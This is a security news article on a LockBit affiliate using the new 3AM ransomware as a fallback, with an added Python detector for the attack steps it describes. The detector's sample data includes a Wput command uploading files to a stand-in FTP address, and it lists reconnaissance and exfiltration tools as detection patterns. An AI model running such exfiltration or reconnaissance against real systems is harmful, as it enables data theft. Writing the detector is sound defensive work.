Attackers use fallback ransomware if LockBit gets blocked

Your security solutions might stave off a LockBit infection, but you might still end up with encrypted files: according to Symantec’s threat researchers, some affiliates are using the 3AM ransomware as a fallback option in case LockBit gets flagged and blocked.

3AM ransomware

LockBit is a known ransomware family that has been unleashing havoc for quite some time now.

But what about 3AM? Dubbed thus because of the .threeamtime extension added to the encrypted files, 3AM is a new ransomware family written in Rust.

According to the researchers’ analysis, it tries to terminate security and backup-related software that’s running on the infected computer and – after encrypting the targeted files and deleting the original ones – it tries to delete Volume Shadow copies.

“To date, the ransomware has only been used in a limited fashion,” the researchers noted – the company’s threat hunters have seen it used in a single attack by a ransomware affiliate.

It also doesn’t seem to be very effective, or stealthy enough to go unnoticed. “The attackers only managed to deploy it to three machines on the organization’s network and it was blocked on two of those three computers.”

Nevertheless, the attackers had some success: before attempting to encrypt them, they exfiltrated the files, which means that they might yet try to extort the victim organization.

“New ransomware families appear frequently and most disappear just as quickly or never manage to gain significant traction. However, the fact that 3AM was used as a fallback by a LockBit affiliate suggests that it may be of interest to attackers and could be seen again in the future,” Symantec threat hunters commented.

Before ransomware deployment

The company does not say how the first system was compromised.

“The first suspicious activity from the threat actor involved the use of the gpresult command to dump the policy settings enforced on the computer for a specified user. The attacker also executed various Cobalt Strike components and tried to escalate privileges on the computer using PsExec,” Symantec threat hunters shared.

The attackers then started doing reconnaissance (with whoami, netstat, quser, and net share commands), tried to enumerate other servers they could move to (with quser and net view commands), added a new user for persistence, and exfiltrated the victim’s files to their own FTP server via the Wput tool.
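The pre-encryption activity described above lends itself to behavioural detection. The following is an added example, not code from Symantec or from the article: it flags a burst of the named discovery commands on one host, PsExec or Wput execution, and files carrying the .threeamtime extension. The event tuple format, the thresholds, the host name and the sample events are assumptions constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery commands named in the article: benign alone, suspicious as a burst.
RECON = {"gpresult", "whoami", "netstat", "quser", "net share", "net view"}
# Tools the article ties to privilege escalation and exfiltration.
TOOLS = {"psexec": "PsExec execution", "wput": "Wput FTP upload"}
WINDOW, MIN_DISTINCT = timedelta(minutes=15), 4  # assumed thresholds; tune locally

def classify(cmdline):
    """Map a command line to ('recon'|'tool', label), or None."""
    parts = cmdline.lower().split() or [""]
    exe = parts[0].rsplit("\\", 1)[-1].removesuffix(".exe")
    if exe == "net" and len(parts) > 1:
        exe = "net " + parts[1]          # distinguish "net share" from "net view"
    if exe in RECON:
        return ("recon", exe)
    return ("tool", TOOLS[exe]) if exe in TOOLS else None

def detect(events):
    """events: (iso_time, host, 'proc'|'file', value). Returns {host: findings}."""
    findings, recon = defaultdict(set), defaultdict(list)
    for ts, host, kind, value in events:
        hit = classify(value) if kind == "proc" else None
        if kind == "file" and value.lower().endswith(".threeamtime"):
            findings[host].add("3AM encrypted-file extension")
        elif hit and hit[0] == "tool":
            findings[host].add(hit[1])
        elif hit:
            recon[host].append((datetime.fromisoformat(ts), hit[1]))
    for host, hits in recon.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):  # slide a window from each hit
            seen = {name for t, name in hits[i:] if t - start <= WINDOW}
            if len(seen) >= MIN_DISTINCT:
                findings[host].add("recon burst: " + ", ".join(sorted(seen)))
                break
    return {host: sorted(f) for host, f in findings.items()}

# Constructed sample events (not taken from Symantec's report).
SAMPLE = [
    ("2023-09-01T02:00:05", "SRV01", "proc", r"C:\Windows\System32\gpresult.exe /z"),
    ("2023-09-01T02:01:10", "SRV01", "proc", "whoami"),
    ("2023-09-01T02:02:00", "SRV01", "proc", "netstat -ano"),
    ("2023-09-01T02:03:30", "SRV01", "proc", "net share"),
    ("2023-09-01T02:20:00", "SRV01", "proc", "wput.exe files.zip ftp://198.51.100.7/"),
    ("2023-09-01T03:00:00", "SRV01", "file", r"C:\data\report.docx.threeamtime"),
]
```

Calling `detect(SAMPLE)` returns all three findings for SRV01. An administrator running one or two of these commands hours apart produces no finding, which is the point of requiring several distinct commands inside the window.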

Symantec has provided indicators of compromise: IP addresses and file hashes for the two malware samples and Cobalt Strike beacons.
